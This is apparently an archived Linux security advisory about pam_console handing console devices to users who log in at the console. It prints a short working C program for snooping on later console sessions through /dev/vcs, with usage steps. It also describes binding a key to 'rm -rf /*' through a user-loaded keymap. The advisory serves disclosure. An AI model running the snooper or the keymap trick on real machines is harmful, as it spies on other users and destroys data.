COMMAND
tty
SYSTEMS AFFECTED
Linux
PROBLEM
Michal Zalewski found following. When accepting luser console
login, pam_console called by /bin/login tries to be user-friendly,
doing several chowns on devices like login tty and corresponding
vcs[a] device, as well as other interesting devices: fd*, audio
devices (dsp*, mixer*, audio*, midi*, sequencer), cdrom,
streamer/zip drive devices, frame buffer devices, kbd*, js*,
video*, radio*, winradio*, vtx*, vbi* and so on. Probably it's
designed to make console logins more comfortable, but has DEADLY
effects on servers with console luser-login ability (and that's
quite common).
On logout, these devices are chown'ed back to root, but unlike
/dev/tty[0-9], these devices have no hangup mechanism, so user
will have full control over them after logout by opening them and
then keeping the file descriptor. The easiest attack is
read-write snooping of consoles. Log in on console once, open
/dev/vcsX (where X corresponds to tty number), then logout. By
continous lseek/read loop, your program will be able to snoop
futher logins on this console - forever. Also, it's possible to
write() on snooped console... Ugh. Other possibilities include
reading any inserted cd, reading/writing any inserted floppy,
messing with video/audio devices and so on, all in the same way.
Minimal tty snoop exploit:
#include <sys/fcntl.h>
main(int argc,char*argv[]) {
char buf[80*24];
int f=open(argv[1],O_RDWR);
while (1) {
lseek(f,0,0);
read(f,buf,sizeof(buf));
write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi
write(1,buf,sizeof(buf));
usleep(10000);
}
}
Log onto console, let's say it's tty3. Then, compile and launch
this program via screen, giving path to vcs device corresponding
to your login tty (in this case, /dev/tty3). Then, detach this
screen and logout. Wait some time, log in remotely to your
account and resume screen session. You should see real-time tty3
dump.
Benjamin Smee found something similar to this a while back in
relation to the keymaps in RH6.1. Login (this only worked when
logging in on Console) as a normal user. He could then write up
a keymap which had strategic keys bound to "rm -rf /*" for example
the tilda key. He could then execute the command (on a default
Redhat 6.1 at any rate).
bash$ loadkeys example.kmap
As a NORMAL user this would load the keymap for ALL consoles.
Initially Benjamin didn't think it was anything new as in the man
page he found:
BUGS
Note that anyone having read access to /dev/console can
run loadkeys and thus change the keyboard layout, possibly
making it unusable. Note that the keyboard translation
table is common for all the virtual consoles, so any
changes to the keyboard bindings affect all the virtual
consoles simultaneously.�
but then he checked the permissions ....
[~]$ ls -la /dev/console
crw------- 1 root root 5, 1 May 2 09:58 /dev/console
[bsmee]-[pts/2]-[maelstrom]-[11:13:02]-[05/04/00]
[~]$
Needless to say a normal user should not have permissions to do
this for the entire console.
tty users may for example do PIO_CMAP ioctl, rendering all
consoles unusable. Many dangerous ioctls() are available for
users simply having open fd to /dev/ttyX, fortunately you might
call ioctl() only when you're logged on console, logout causes
hang up of the tty device. To do it again, you must log locally
one more time.
SOLUTION
Nothing yet.